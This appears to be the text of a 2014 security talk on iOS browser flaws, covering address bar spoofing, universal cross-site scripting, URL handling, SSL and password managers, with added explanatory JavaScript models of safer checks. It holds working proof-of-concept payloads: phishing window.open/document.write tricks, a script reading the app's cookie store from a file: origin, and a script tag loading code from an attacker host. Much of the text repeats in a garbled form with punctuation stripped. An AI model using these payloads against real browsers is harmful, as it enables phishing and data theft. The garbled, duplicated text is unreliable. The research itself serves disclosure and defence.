• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://iosbrowsr-tests.com

Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebView API
• stringByEvaluatingJavaScriptFromString: runs in the origin of the currently loaded request.mainDocumentURL
• No access to subframes from a domain other than the top document's
(diagram: top document http://example.com, cross-origin subframe http://hidden.tld)
UIWebView & WKWebView
JavaScript is used to implement browser features, and to override native functions in order to bridge them with Objective-C code
UIWebViewDelegate
• webView:shouldStartLoadWithRequest:navigationType:
• webViewDidStartLoad:
• webViewDidFinishLoad:
• webView:didFailLoadWithError:
iOS 8 beta: WKWebView
• configuration.preferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)
Bolted on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)
Testing
• Inspiration from the Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from the web perspective, review of JavaScript code, a bit of reversing and debugging
• Cross-browser test cases: https://iosbrowsr-tests.com/
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Mobile Browsers Security iOS
Address Bar Spoofing

Address bar spoofing
• Look-alike (IDN etc.)
• URL tracking desynchronization

URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Address Bar Spoofing: Untracked Content
Replace the window content with untracked content; document.write and/or data: URIs are usually good candidates
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise the window with the target URL, then replace it with phishing content before it loads
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
Affected:
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
An incorrect URL often remains in the address bar after navigation errors
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts
Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function(){ location = 'https://accounts.google.com:8443/' }, …)
Title bar (screenshot: a phishing page whose title imitates an address bar)
<title>https://www.apple.com</title>
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: the KVO-compliant WKWebView.URL property
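The address bar tips can be checked against the spoofing techniques from the preceding slides with a small model. The JavaScript below is an added example, not code from the deck or from any browser it names: it feeds an address-bar model the same events a UIWebViewDelegate receives and compares a naive bar (URL shown on the navigation attempt, never corrected on failure) with one that follows the tips. The tab state, the event names and the validTLS flag standing in for the browser's own certificate check are assumptions of the model.

```javascript
// Added example, not from the SyScan360 deck: an address-bar model driven by
// UIWebViewDelegate-style events. mode 'naive' updates the bar on the
// navigation attempt and ignores failures; mode 'strict' shows only the
// committed document and grants the padlock only to a validated TLS load.
// The validTLS flag is an assumption standing in for the real certificate check.
function makeAddressBar(mode) {
  const bar = { committed: null, pending: null, shown: 'about:blank', lock: false };

  // Strict rendering: the bar reflects what is actually loaded in the web view.
  function render() {
    if (mode === 'naive') return;
    bar.shown = bar.committed ? bar.committed.url : 'about:blank';
    bar.lock = !!bar.committed &&
      bar.committed.url.startsWith('https://') && bar.committed.validTLS;
  }

  return {
    state: bar,
    // webView:shouldStartLoadWithRequest:navigationType:
    shouldStart(url) {
      bar.pending = url;
      if (mode === 'naive') {
        bar.shown = url;                        // stale if the load never commits
        bar.lock = url.startsWith('https://');  // padlock from the scheme alone
      }
      render();
    },
    // webViewDidFinishLoad: (validTLS comes from the connection, not the URL)
    didFinish(url, validTLS) {
      bar.pending = null;
      bar.committed = { url, validTLS: validTLS === true };
      if (mode === 'naive') { bar.shown = url; bar.lock = url.startsWith('https://'); }
      render();
    },
    // webView:didFailLoadWithError: the web view still shows the old document
    didFail() {
      bar.pending = null;
      render();   // the naive bar does nothing here, which is the bug
    },
  };
}

// "Failed navigation" from the deck: phishing page from the attacker's host,
// then location = https://login.target.tld, which fails to resolve.
function failedNavigationSpoof(mode) {
  const ab = makeAddressBar(mode);
  ab.shouldStart('http://attacker.tld/login.html');
  ab.didFinish('http://attacker.tld/login.html', false);
  ab.shouldStart('https://login.target.tld/');
  ab.didFail();                                   // DNS NXDOMAIN
  return { shown: ab.state.shown, lock: ab.state.lock };
}

// "Loading loop": a navigation to a filtered port that never connects.
function loadingLoopSpoof(mode) {
  const ab = makeAddressBar(mode);
  ab.shouldStart('http://attacker.tld/');
  ab.didFinish('http://attacker.tld/', false);
  ab.shouldStart('https://accounts.google.com:8443/');   // hangs until timeout
  return { shown: ab.state.shown, lock: ab.state.lock };
}

// A genuine https load, with and without a validated certificate.
function genuineLoad(mode, validTLS) {
  const ab = makeAddressBar(mode);
  ab.shouldStart('https://accounts.google.com/');
  ab.didFinish('https://accounts.google.com/', validTLS);
  return { shown: ab.state.shown, lock: ab.state.lock };
}
```

The naive bar ends the failed-navigation and loading-loop scenarios showing the victim's host with a padlock while the attacker's document is still on screen; the strict bar keeps showing the attacker's URL because nothing was committed. A self-signed certificate that the browser silently accepted (validTLS false) also earns no padlock in strict mode.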
UXSS: Universal Cross-Site Scripting

Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007
Universal Cross-Site Scripting
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
How the cross-tab bridge works (diagram):
w = window.open('about:blank')
  → mbexec:$(WINDOW_ID)[{ "command": "window.open", "target": 1234, "url": "about:blank" }]   (target id from Math.random())
  → [webView loadRequest: … "about:blank" …]
  (annotation: cross-frame forgery)
w.document.write('Hi')
  → mbexec:$(WINDOW_ID)[{ "command": "window.document.write", "target": 1234, "html": "Hi" }]
  → [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>'); … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome for iOS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata: origin. Same as file: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') shows the applewebdata: origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView's UIDelegate, webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
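The three bridge bugs above (no check at all, a check made only at window.open() and then trusted after a redirect, and an about:blank child that loses its opener's origin) can be contrasted with the safe form in one model. The JavaScript below is an added example and is not code from the deck or from Mercury, Yandex.Browser or Chrome for iOS: it models the native-side dispatcher behind a cross-tab bridge and lets the policy be switched between the behaviours the slides describe. Tab ids, the command names, the `isolated` flag for an attachment document and the originOf() helper are assumptions of the model.

```javascript
// Added example, not code from the deck or from Mercury, Yandex.Browser or
// Chrome for iOS: a model of the native-side dispatcher behind a cross-tab
// JavaScript bridge (window.open / document.write forwarded between tabs).
//   policy 'none'   : no origin check at all (the Mercury case above)
//   policy 'atOpen' : origin checked once when the child is opened, then
//                     cached (the Yandex case: stale once the child redirects)
//   policy 'always' : re-checked on every command against the child's current
//                     origin (the hardened form)
// Tab ids, command names and the `isolated` flag are assumptions of the model.

// scheme://host[:port] of an http(s) URL; null for anything else.
function originOf(url) {
  const m = /^(https?):\/\/([^/:?#]+)(?::(\d+))?/.exec(url);
  return m ? m[1] + '://' + m[2].toLowerCase() + (m[3] ? ':' + m[3] : '') : null;
}

function makeBrowser(policy) {
  const tabs = new Map();   // id -> { url, origin, html, allowedWriter }
  let nextId = 1;
  function addTab(url, origin) {
    const id = nextId++;
    tabs.set(id, { url, origin, html: '', allowedWriter: null });
    return id;
  }
  return {
    // Top-level load. `isolated` marks a Content-Disposition: attachment
    // document: WebKit gives it an opaque origin although location.hostname
    // still names the hosting site, so a hostname comparison would be fooled.
    load(url, isolated = false) {
      return addTab(url, isolated ? null : originOf(url));
    },
    // The child navigated (e.g. a server-side redirect), as reported by the
    // web view's delegate. The origin must be taken from here, not cached.
    navigate(tabId, url) {
      const t = tabs.get(tabId);
      t.url = url;
      t.origin = originOf(url);
    },
    // Bridge command window.open(url) issued from tab `caller`.
    open(caller, url) {
      const c = tabs.get(caller);
      // about:blank inherits the opener's origin: this is what loading it with
      // baseURL:@"about:blank" keeps and what baseURL:nil (applewebdata:) loses.
      const childOrigin = url === 'about:blank' ? c.origin : originOf(url);
      const id = addTab(url, childOrigin);
      if (policy === 'atOpen' && childOrigin !== null && childOrigin === c.origin) {
        tabs.get(id).allowedWriter = caller;   // decided once, never revisited
      }
      return id;
    },
    // Bridge command w.document.write(html) from tab `caller` into `target`.
    // Returns true when the native side would run the script in the target.
    write(caller, target, html) {
      const c = tabs.get(caller), t = tabs.get(target);
      let allowed;
      if (policy === 'none') allowed = true;
      else if (policy === 'atOpen') allowed = t.allowedWriter === caller;
      else allowed = c.origin !== null && t.origin !== null && c.origin === t.origin;
      if (!allowed) return false;
      t.html = html;   // stringByEvaluatingJavaScriptFromString: would run here
      return true;
    },
  };
}

const PAYLOAD = '<script src="http://attacker.tld/x.js"></script>';   // constructed

// Yandex-style: open a same-origin child, let it redirect, then write into it.
function redirectThenWrite(policy) {
  const b = makeBrowser(policy);
  const attacker = b.load('http://attacker.tld/');
  const child = b.open(attacker, 'http://attacker.tld/go');
  b.navigate(child, 'https://accounts.google.com/');
  return b.write(attacker, child, PAYLOAD);
}

// Mercury-style: open the victim site directly and write into it.
function directWrite(policy) {
  const b = makeBrowser(policy);
  const attacker = b.load('http://attacker.tld/');
  return b.write(attacker, b.open(attacker, 'https://accounts.google.com/'), PAYLOAD);
}

// Legitimate use: a site opens about:blank and writes its own content.
function blankWrite(policy) {
  const b = makeBrowser(policy);
  const site = b.load('https://example.com/');
  return b.write(site, b.open(site, 'about:blank'), '<p>Hi</p>');
}

// An uploaded attachment (isolated origin) tries the location.hostname trick.
function attachmentWrite(policy) {
  const b = makeBrowser(policy);
  const att = b.load('https://example.com/uploads/evil.html', true);
  return b.write(att, b.open(att, 'https://example.com/'), PAYLOAD);
}
```

Only the 'always' policy refuses the redirected child, the directly opened victim and the attachment's hostname trick while still letting a site write into its own about:blank popup. The check compares full origins taken from the web view's current state at the time of each command; comparing hostnames, or trusting a decision made when the window was opened, reproduces the bugs the slides describe.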
Other potential paths to the applewebdata: or file: origin
• baseURL: [NSURL URLWithString:@"http://example.com/%"] → nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com/%"), NULL) → NULL
• Downloads opened directly from file:
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+), but document.location.href and document.referrer still name the hosting site, which defeats a custom SOP check built on them:
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream rendered as HTML
• application/other with a filename ending in .html rendered as HTML
JS without Same-Origin-Policy: a document in the file: origin reads the app's cookie store
<script>
// rebuild the application container path from the components of the file: URL,
// then read the cookie store with a synchronous XHR (allowed in the file: origin)
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);
  x.send();
  alert(x.responseText);
}
</script>

JS without Same-Origin-Policy: read an intranet page
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>
Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes (diagram)
• Native (WebKit)
• Application (bolted-on), e.g.
  scheme://download?https://secure.tld/victim/data
  scheme://download?http://attacker.tld/README.html
  scheme://add-filter?url=…
• Bridge (internal)
• Registered (external)
CFURL null pointer dereference
• A malformed URL makes CFURLCreateWithString return NULL; any CFURL function that then gets that NULL as an argument dereferences a null pointer
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
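The password manager findings above translate into a small set of checks a bolted-on manager should make before it injects a saved credential, and into the rule for the key under which a submitted password is stored. The JavaScript below is an added example, not the deck's code nor that of any browser it tested. The record layout and the page descriptor (as the browser would build it from the web view's mainDocumentURL and its delegate events), the tlsValidated flag and the originOf() helper are assumptions.

```javascript
// Added example, not from the deck or from any browser it tested: the checks a
// bolted-on password manager makes before injecting a saved credential, and
// the key under which a submitted password may be stored. The record layout,
// the page descriptor and the tlsValidated flag are assumptions.

// Full origin: scheme, lower-cased host and explicit port. http and https
// on the same host are different origins, as are different ports.
function originOf(url) {
  const m = /^(https?):\/\/([^/:?#]+)(?::(\d+))?/.exec(url);
  if (!m) return null;
  const port = m[3] || (m[1] === 'https' ? '443' : '80');
  return m[1] + '://' + m[2].toLowerCase() + ':' + port;
}

// page = { url, isTopFrame, committed, tlsValidated }
function autofillDecision(saved, page) {
  // The injected JavaScript runs with the top frame's privileges: a login
  // form inside a subframe may belong to another site, so never fill it.
  if (!page.isTopFrame) return { fill: false, reason: 'subframe' };
  // Fill only into the document that actually finished loading, not into
  // content written while a navigation is still pending.
  if (!page.committed) return { fill: false, reason: 'not committed' };
  // Match scheme and port, not just the host name.
  const want = originOf(saved.origin), have = originOf(page.url);
  if (have === null || have !== want) return { fill: false, reason: 'origin mismatch' };
  // An https page reached over a silently accepted self-signed certificate
  // is an attacker's page with the right origin string.
  if (page.url.startsWith('https://') && !page.tlsValidated) {
    return { fill: false, reason: 'tls not validated' };
  }
  return { fill: true, reason: 'ok' };
}

// The key for a "save this password?" prompt: derived from the committed top
// document, never from an origin that page script claims over the bridge.
function saveKeyFor(page) {
  if (!page.isTopFrame || !page.committed) return null;
  return originOf(page.url);
}

// Constructed sample: the record the user saved on the real login page.
const SAVED = { origin: 'https://accounts.example.com', username: 'alice', password: 'hunter2' };
```

The scheme check is the one the deck reports as most often missing: with a host-only comparison, a plain-http page on the same host (reachable by anyone who can inject into the victim's traffic) receives the credential saved for the https site.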
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://iosbrowsr-tests.com/
Questions?
lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
